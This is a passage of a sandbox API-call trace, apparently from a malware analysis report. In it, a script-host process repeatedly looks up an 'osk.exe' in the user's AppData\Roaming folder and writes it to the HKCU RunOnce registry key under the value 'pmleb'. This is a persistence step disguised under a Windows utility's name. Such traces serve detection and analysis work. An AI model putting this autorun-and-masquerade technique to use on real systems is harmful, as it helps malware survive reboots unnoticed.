returned 0x0 [0080.505] RegCloseKey (hKey=0x280) returned 0x0 [0080.505] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.505] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.505] SetTimer (hWnd=0x20280, nIDEvent=0x207e, uElapse=0xa, lpTimerFunc=0x0) returned 0x207e [0080.505] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.517] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.517] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.517] KillTimer (hWnd=0x20280, uIDEvent=0x207e) returned 1 [0080.517] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.517] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.518] IUnknown:Release (This=0x787518) returned 0x1 [0080.518] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.518] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.518] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.518] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.518] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3 
[0080.518] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.518] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4 [0080.519] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.519] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3 [0080.519] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.520] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.520] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.520] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.520] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.520] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.520] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.520] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.520] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.520] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.520] RegCloseKey (hKey=0x280) returned 0x0 [0080.521] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.521] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.521] SetTimer (hWnd=0x20280, nIDEvent=0x207f, uElapse=0xa, lpTimerFunc=0x0) returned 0x207f [0080.521] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.533] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.533] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.533] KillTimer (hWnd=0x20280, uIDEvent=0x207f) returned 1 [0080.533] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.533] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.533] IUnknown:Release (This=0x787518) returned 0x1 [0080.533] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.533] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.533] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, 
wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.534] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.534] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.534] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4 [0080.534] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.534] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5 [0080.534] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.535] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4 [0080.535] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.535] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.535] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.535] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.535] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.535] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.535] WideCharToMultiByte (in: CodePage=0x0, 
dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.535] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.536] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.536] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.536] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.536] RegCloseKey (hKey=0x280) returned 0x0 [0080.536] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.536] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.536] SetTimer (hWnd=0x20280, nIDEvent=0x2080, uElapse=0xa, lpTimerFunc=0x0) returned 0x2080 
[0080.536] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.596] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.596] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.596] KillTimer (hWnd=0x20280, uIDEvent=0x2080) returned 1 [0080.596] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.596] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.596] IUnknown:Release (This=0x787518) returned 0x1 [0080.597] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.597] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.597] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, 
pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.597] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.597] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5 [0080.597] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: 
rgDispId=0x33f0d0*=0) returned 0x0 [0080.597] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6 [0080.597] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.598] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5 [0080.598] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.598] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.599] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.599] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.599] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.599] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.599] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 